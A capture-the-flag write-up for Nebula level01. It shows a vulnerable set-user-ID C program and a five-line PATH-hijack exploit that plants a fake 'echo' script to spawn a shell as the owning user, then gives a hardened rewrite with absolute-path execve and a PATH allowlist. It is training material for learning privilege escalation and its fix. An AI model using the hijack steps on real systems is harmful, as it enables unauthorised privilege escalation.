
Nebula level01

https://exploit-exercises.com/nebula/level01/

Goal

Call getflag from an account that has permissions to run it. In these exercises, the goal is to call getflag from any of the flag... accounts.

Source code

flag01.c

#define _GNU_SOURCE   /* glibc needs this for the setresgid/setresuid prototypes */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  /* The binary is set-user-ID, so the effective ids are the file owner's (flag01). */
  gid = getegid();
  uid = geteuid();

  /* Make real, effective and saved ids all equal to the owner's, so any child
     process keeps those privileges as well. */
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  /* system() runs this through /bin/sh; "echo" is looked up via the caller's PATH. */
  system("/usr/bin/env echo and now what?");
}

Exploit

From Wikipedia:

"/usr/bin/env is a shell command for Unix and Unix-like operating systems. It is used to either print a list of environment variables or run another utility in an altered environment without having to modify the currently existing environment. Using env, variables may be added or removed, and existing variables may be changed by assigning new values to them."

Running commands through /usr/bin/env means the program is started with the caller's current environment, including PATH. For this program that is a problem: the caller controls PATH, so they can make the lookup of echo resolve to their own executable. Because flag01 is a SUID program (it runs with the privileges of the file's owner no matter who invokes it, which is root for a root-owned binary and the flag01 user here), that substitute echo runs with the owner's privileges.

To exploit this, create a bash script called echo that opens a shell. Add the directory containing that echo to the front of PATH, and then run the program. Because flag01 is a SUID program, the echo script is executed as the flag01 user, which gives you a shell as that user. These are the commands to exploit the system:

touch ~/echo
echo "/bin/bash" > ~/echo
chmod +x ~/echo
export PATH=~:$PATH
./flag01

These commands open a shell as the flag01 user. Now we can just run getflag.
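The fix for this class of bug is not to trust the caller's environment at all: resolve helper programs by absolute path and hand the child a fixed, minimal environment instead of relying on system() and PATH lookup. The following hardened rewrite of flag01.c is an added example for this writeup, not code from the Nebula exercise; run_echo_hardened() and path_is_trusted() are names chosen here, and the PATH allowlist (/usr/bin and /bin) is an assumption for the example. path_is_trusted() also shows how to reject the PATH the exploit above relies on, since a leading home directory, a relative entry or an empty component (which the shell treats as the current directory) all fail the check.

```c
#define _GNU_SOURCE          /* for setresgid/setresuid prototypes on glibc */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Directories a set-user-ID program may accept in PATH (assumed allowlist). */
static const char *const trusted_dirs[] = { "/usr/bin", "/bin", NULL };

/* Return 1 if every component of `path` is exactly one of trusted_dirs, else 0.
 * An empty component ("" between two colons, or a leading/trailing colon) means
 * "current directory" to the shell and is rejected, as is any relative entry
 * such as "~" or ".". */
int path_is_trusted(const char *path)
{
    if (path == NULL || *path == '\0')
        return 0;
    const char *p = path;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        if (len == 0 || p[0] != '/')
            return 0;
        int ok = 0;
        for (const char *const *d = trusted_dirs; *d != NULL; d++) {
            if (strlen(*d) == len && memcmp(*d, p, len) == 0) {
                ok = 1;
                break;
            }
        }
        if (!ok)
            return 0;
        if (colon == NULL)
            return 1;
        p = colon + 1;
    }
}

/* Run /bin/echo by absolute path with an environment we construct ourselves,
 * so nothing the caller exported (PATH, IFS, LD_*) reaches the child.
 * Returns the child's exit status, or -1 if it could not be run. */
int run_echo_hardened(const char *message)
{
    char *const argv[] = { "/bin/echo", (char *)message, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, envp);   /* no PATH search: absolute path only */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    gid_t gid = getegid();
    uid_t uid = geteuid();
    /* Same privilege handling as the original, but check the result. */
    if (setresgid(gid, gid, gid) != 0 || setresuid(uid, uid, uid) != 0) {
        perror("setresgid/setresuid");
        return 1;
    }
    const char *path = getenv("PATH");
    if (!path_is_trusted(path))
        fprintf(stderr, "warning: ignoring untrusted PATH: %s\n",
                path ? path : "(unset)");
    /* Safe either way: the helper is not resolved through the caller's PATH. */
    return run_echo_hardened("and now what?") == 0 ? 0 : 1;
}
```

With this version the steps in the exploit section no longer matter: PATH=~:$PATH is flagged by path_is_trusted(), and even without that check the child is started from /bin/echo with an environment the program built itself, so the attacker's echo script is never consulted.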